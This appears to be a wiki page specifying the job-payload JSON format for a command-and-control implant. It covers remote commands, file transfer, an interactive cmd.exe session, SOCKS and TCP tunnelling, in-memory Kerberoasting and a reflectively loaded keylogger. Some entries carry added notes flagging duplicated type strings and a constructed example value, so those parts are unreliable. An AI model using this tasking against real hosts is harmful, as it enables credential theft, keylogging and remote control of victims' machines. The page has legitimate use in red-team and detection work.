
Job Payloads

p3nt4 edited this page Feb 25, 2022 · 15 revisions

Job payloads

Job payloads are in the format {Type: "", Options: {}} and can be implemented in any way desired, although using standardized payloads will improve compatibility with modules and clients down the road. Note that the examples below write the keys in lower case ("type", "options").

The following job payloads are currently defined:

Command

Payload:

{
  "type":"command", 
  "options":{
    "path":".", // The path to execute the command in (Optional)
    "cmd":"hostname" // The command
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}

Exit

Payload:

{
  "type":"exit", 
  "options":{}
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Bye Bye!", // A polite good bye message
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}

Configure

Payload:

{
  "type":"configure",
  "options":{
    "config":{"sleep":"5"} // An object containing the configuration items to modify
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "{\"sleep\":\"5\",\"maxrequestsize\":\"50000\",\"id\":\"O4jRCnANBHj4StyFIbt7SYon3d797cDC\"}", // The new configuration of the implant (as a string)
  "jobId": "IbaWXsw94KukCs9gmfjTq1Jj09SXQRdW"
}

Download

Payload:

{
  "type":"download",
  "options":{
    "file":"calc.bat", // The absolute or relative path to write the downloaded file to
    "filename":"calc.bat", // The original filename of the file, used if "file" is a directory
    "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to load the file from
    "length":20, // The size of the file in bytes
    "path":"C:\\Temp" // The path to execute the download from (if the file option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp\\calc.bat", // The path where the file was downloaded
  "jobId": "MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv"
}

Upload

Payload:

{
  "type":"upload",
  "options":{
    "file":"calc.bat", // The absolute or relative path of the file to upload
    "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to upload the file to
    "path":"C:\\Temp" // The path to execute the upload from (if the file option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp\\calc.bat", // The path of the uploaded file
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

CD

Payload:

{
  "type":"cd",
  "options":{
    "dir":"Temp", // The absolute or relative path of the directory to CD into
    "path":"C:\\" // The path where to execute the CD from (if the dir option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp", // The new directory
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Interactive

Payload:

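{
  "type":"socks", // NOTE: identical to the type of the Socks payload below; likely a copy-paste leftover. Confirm the actual type string for interactive jobs against the implant source.
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe the process needs to interact with
    "filename": "cmd.exe", // The program to execute
    "path": "C:\\Temp" // The path to execute it from (constructed example value; the original page left this value blank)
  }
}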

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Process Terminated!", 
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Socks

Payload:

{
  "type":"socks",
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB" // The pipe the socks proxy needs to connect to
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Connection Closed",
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

TCP Forwarding

Payload:

{
  "type":"tcp_fwd",
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe the tcp stream needs to be connected to
    "host": "www.google.com",
    "port": 443
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Connection Closed",
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Powershell Execution

Payload:

{
    "type":"posh_in_mem", 
    "options":{
        "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to load the powershell file from
        "length": "12345", // The length of the powershell file
        "command": "Invoke-Kerberoast" // A command to add at the end of the script
    }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}

Reflected Assembly Execution

Payload:

{
    "type":"posh_in_mem", // NOTE: identical to the type of the Powershell Execution payload above; likely a copy-paste leftover. Confirm the actual type string for assembly execution against the implant source.
    "options":{
        "pipe_id": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe to load the assembly file from
        "length": "12345", 
        "filename": "SharpSploit.dll", // The name of the assembly
        "class":  "SharpSploit.Enumeration.Keylogger", // The class to run
        "method": "StartKeylogger", // The method to run
        "arguments": "[int]25", // Argument list in the format: MyString,[bool]true,[int]21
        "cache": true // Allow caching of assembly file
    }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}